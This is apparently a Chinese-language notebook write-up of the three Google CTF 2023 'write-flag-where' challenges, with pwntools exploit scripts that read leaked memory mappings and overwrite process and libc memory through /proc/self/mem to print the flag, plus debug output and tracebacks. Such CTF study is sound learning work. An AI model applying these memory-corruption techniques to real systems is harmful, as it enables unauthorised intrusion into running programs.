# Google Capture The Flag 2023	
## WRITE-FLAG-WHERE

二进制文件反编译获得代码，代码中主要涉及到的一些函数如下：
* int **open**(const char *pathname, int flags);
* ssize_t **read**(int fd, void buf, size_t count);
* int **dup2**(int oldfd, int newfd);
* off64_t **lseek64**(int fd, off64_t offset, int whence);

代码中还涉及到两个关键的进程文件：
* /proc/self/maps
* /proc/self/mem

maps示例如下：
```
55fe67551000-55fe67552000 r--p 00000000 00:fd 562618                     /home/user/chal
55fe67552000-55fe67553000 r-xp 00001000 00:fd 562618                     /home/user/chal
55fe67553000-55fe67554000 r--p 00002000 00:fd 562618                     /home/user/chal
55fe67554000-55fe67555000 r--p 00002000 00:fd 562618                     /home/user/chal
55fe67555000-55fe67556000 rw-p 00003000 00:fd 562618                     /home/user/chal
55fe67556000-55fe67557000 rw-p 00000000 00:00 0
7f95fd9cc000-7f95fd9cf000 rw-p 00000000 00:00 0
7f95fd9cf000-7f95fd9f7000 r--p 00000000 00:fd 563397                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f95fd9f7000-7f95fdb8c000 r-xp 00028000 00:fd 563397                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f95fdb8c000-7f95fdbe4000 r--p 001bd000 00:fd 563397                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f95fdbe4000-7f95fdbe8000 r--p 00214000 00:fd 563397                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f95fdbe8000-7f95fdbea000 rw-p 00218000 00:fd 563397                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f95fdbea000-7f95fdbf7000 rw-p 00000000 00:00 0
7f95fdbf9000-7f95fdbfb000 rw-p 00000000 00:00 0
7f95fdbfb000-7f95fdbfd000 r--p 00000000 00:fd 563379                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
7f95fdbfd000-7f95fdc27000 r-xp 00002000 00:fd 563379                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
7f95fdc27000-7f95fdc32000 r--p 0002c000 00:fd 563379                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
7f95fdc33000-7f95fdc35000 r--p 00037000 00:fd 563379                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
7f95fdc35000-7f95fdc37000 rw-p 00039000 00:fd 563379                     /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
7ffc61fcc000-7ffc61fed000 rw-p 00000000 00:00 0                          [stack]
7ffc61ff1000-7ffc61ff5000 r--p 00000000 00:00 0                          [vvar]
7ffc61ff5000-7ffc61ff7000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
```

而mem是进程的内存内容，修改该文件相当于直接修改当前进程的内存

In [7]:
from pwn import *

context.log_level = 'DEBUG'
context.binary = ELF('./chal')

p = remote('wfw1.2023.ctfcompetition.com', '1337')

p.recvuntil(b"I'll give you my mappings so that you'll have a shot.\n")
start_addr = int(p.recvuntil(b'\n').decode().split('-')[0], base=16)

target_addr = start_addr + 0x21e0

payload = b'0x%x 70' %target_addr
p.sendlineafter(b'Send me nothing and I will happily expire\n', payload)
p.sendline()
sleep(1)
p.recv()
p.close()

[x] Opening connection to wfw1.2023.ctfcompetition.com on port 1337
[x] Opening connection to wfw1.2023.ctfcompetition.com on port 1337: Trying 34.78.126.136
[+] Opening connection to wfw1.2023.ctfcompetition.com on port 1337: Done
[DEBUG] Received 0x1e bytes:
    b'== proof-of-work: disabled ==\n'
[DEBUG] Received 0x578 bytes:
    b'This challenge is not a classical pwn\n'
    b'In order to solve it will take skills of your own\n'
    b'An excellent primitive you get for free\n'
    b'Choose an address and I will write what I see\n'
    b"But the author is cursed or perhaps it's just out of spite\n"
    b'For the flag that you seek is the thing you will write\n'
    b"ASLR isn't the challenge so I'll tell you what\n"
    b"I'll give you my mappings so that you'll have a shot.\n"
    b'558d18bfc000-558d18bfd000 r--p 00000000 00:fd 562618                     /home/user/chal\n'
    b'558d18bfd000-558d18bfe000 r-xp 00001000 00:fd 562618                     /home/user/chal\n'
    b'558d18b

***

## WRITE-FLAG-WHERE2

观察二进制文件反编译后的代码，发现while循环中不再打印信息；

但是发现exit函数后面存在打印信息的代码；

```
        00101445 8b  45  f4       MOV        EAX ,dword ptr [RBP  + -0xc ]
        00101448 48  8d  15       LEA        RDX ,[s_Somehow_you_got_here??_001020d5 ]        = "Somehow you got here??\n"
                 86  0c  00  00
        0010144f 48  89  d6       MOV        RSI =>s_Somehow_you_got_here??_001020d5 ,RDX     = "Somehow you got here??\n"
        00101452 89  c7           MOV        EDI ,EAX
        00101454 b8  00  00       MOV        EAX ,0x0
                 00  00
        00101459 e8  32  fc       CALL       <EXTERNAL>::dprintf                              int dprintf(int __fd, char * __f
                 ff  ff
```

因此只要覆盖调用exit函数的指令即可，已知flag的前四个字符`CTF{`，可以选择写入内存的指令如下：

In [13]:
context.log_level = 'INFO'
print(disasm(b'C'))
print(disasm(b'T'))
print(disasm(b'F'))
print(disasm(b'{'))
print(disasm(b'CT'))

   0:   43                      rex.XB
   0:   54                      push   rsp
   0:   46                      rex.RX
   0:   7b                      .byte 0x7b
   0:   43 54                   rex.XB push r12


目标处原来的字节码是`e8 8b fc ff ff`，将其改写为`43 54 54 54 54`，由于`push rsp`以及`rex.XB push r12`操作不会使程序崩溃，因此可以顺利执行后续的指令；

然后再将flag写入`Somehow you got here??`内存地址处，即可成功打印出flag

In [25]:
from pwn import *

context.log_level = 'DEBUG'
context.binary = ELF('./chal')

p = remote('wfw2.2023.ctfcompetition.com', '1337')

p.recvuntil(b"It's the challenge from before, but I've removed all the fluff\n")
base_addr = int(p.recvuntil(b'\n').decode().split('-')[0], 16)
p.recvuntil(b'\n\n')

def nop(addr):
    p.sendline(b'0x%x 2' %addr)
    sleep(0.5)

nop(base_addr+0x1443)
nop(base_addr+0x1442)
nop(base_addr+0x1441)
nop(base_addr+0x1440)
p.sendline(b'0x%x 70' %(base_addr+0x20d5))
sleep(2)
p.sendline()
sleep(2)
p.recv()
p.interactive()

[x] Opening connection to wfw2.2023.ctfcompetition.com on port 1337
[x] Opening connection to wfw2.2023.ctfcompetition.com on port 1337: Trying 34.140.170.64
[+] Opening connection to wfw2.2023.ctfcompetition.com on port 1337: Done
[DEBUG] Received 0x1e bytes:
    b'== proof-of-work: disabled ==\n'
[DEBUG] Received 0x578 bytes:
    b"Was that too easy? Let's make it tough\n"
    b"It's the challenge from before, but I've removed all the fluff\n"
    b'557e5f1a5000-557e5f1a6000 r--p 00000000 00:116 1330304                   /home/user/chal\n'
    b'557e5f1a6000-557e5f1a7000 r-xp 00001000 00:116 1330304                   /home/user/chal\n'
    b'557e5f1a7000-557e5f1a8000 r--p 00002000 00:116 1330304                   /home/user/chal\n'
    b'557e5f1a8000-557e5f1a9000 r--p 00002000 00:116 1330304                   /home/user/chal\n'
    b'557e5f1a9000-557e5f1aa000 rw-p 00003000 00:116 1330304                   /home/user/chal\n'
    b'557e5f1aa000-557e5f1ab000 rw-p 00000000 00:00 0 \n'
  

Exception in thread Thread-14 (recv_thread):
Traceback (most recent call last):
  File "/usr/lib/python3.10/threading.py", line 1016, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.10/threading.py", line 953, in run
    self._target(*self._args, **self._kwargs)
  File "/home/min/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py", line 885, in recv_thread
    stdout.write(cur)
  File "/usr/lib/python3/dist-packages/ipykernel/iostream.py", line 511, in write
    raise TypeError(
TypeError: write() argument must be str, not <class 'bytes'>


***

## WRITE-FLAG-WHERE3



In [4]:
from pwn import *
import time

elf = ELF("./chal")
libc = ELF("./libc.so.6")

context.binary = elf
context.log_level = 'DEBUG'

p = remote('wfw3.2023.ctfcompetition.com', '1337')

def write(addr, len):
    #p.stdout.write(f'0x{addr:x} {len}\n'.encode())
    p.sendline(f'0x{addr:x} {len}'.encode())
    time.sleep(1)

libc_found = False
elf_found = False
while True:
    line = p.recvline().decode('ascii').strip()
    if 'chal' in line and not elf_found:
        elf_base = int(line.split()[0].split('-')[0], 16)
        elf_found = True

    if line.endswith('libc.so.6') and not libc_found:
        libc_base = int(line.split()[0].split('-')[0], 16)
        libc_found = True

    if line.endswith('[stack]'):
        stack_bottom = int(line.split()[0].split('-')[1], 16)
        break

print(hex(elf_base))
print(hex(libc_base))
print(hex(stack_bottom))

input_buf_offset = 5856

for i in range(0x1149b2, 0x1149b7):
    write(libc_base + i, 1)

for i in range(0x114a08, 0x114a0f):
    write(libc_base + i, 1)

write(libc_base + 0x114a60, 1)

write(libc_base + 0x1149cf, 4)
write(libc_base + 0x1149ce, 4)

write(libc_base + 0x114a1c, 1)
write(libc_base + 0x1149c0, 1)

write(libc_base + 0x11499f, 1)
write(libc_base + 0x11499e, 1)
write(libc_base + 0x11499d, 1)
write(libc_base + 0x11499c, 1)
write(libc_base + 0x11499b, 1)
write(libc_base + 0x11499a, 1)
p.send(("a"*0x13).encode()+p64(elf_base + 0x50a0))
time.sleep(1)
p.send(b"CT")
time.sleep(2)
print(p.recv())
p.interactive()

[x] Opening connection to wfw3.2023.ctfcompetition.com on port 1337
[x] Opening connection to wfw3.2023.ctfcompetition.com on port 1337: Trying 34.22.250.46
[+] Opening connection to wfw3.2023.ctfcompetition.com on port 1337: Done
[DEBUG] Received 0x562 bytes:
    b'== proof-of-work: disabled ==\n'
    b"Your skills are considerable, I'm sure you'll agree\n"
    b"But this final level's toughness fills me with glee\n"
    b'No writes to my binary, this I require\n'
    b'For otherwise I will surely expire\n'
    b'55ee11545000-55ee11546000 r--p 00000000 00:116 1034061                   /home/user/chal\n'
    b'55ee11546000-55ee11547000 r-xp 00001000 00:116 1034061                   /home/user/chal\n'
    b'55ee11547000-55ee11548000 r--p 00002000 00:116 1034061                   /home/user/chal\n'
    b'55ee11548000-55ee11549000 r--p 00002000 00:116 1034061                   /home/user/chal\n'
    b'55ee11549000-55ee1154a000 rw-p 00003000 00:116 1034061                   /home/user/chal

Exception in thread Thread-8 (recv_thread):
Traceback (most recent call last):
  File "/usr/lib/python3.10/threading.py", line 1016, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.10/threading.py", line 953, in run
    self._target(*self._args, **self._kwargs)
  File "/home/min/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py", line 885, in recv_thread
    stdout.write(cur)
  File "/usr/lib/python3/dist-packages/ipykernel/iostream.py", line 511, in write
    raise TypeError(
TypeError: write() argument must be str, not <class 'bytes'>
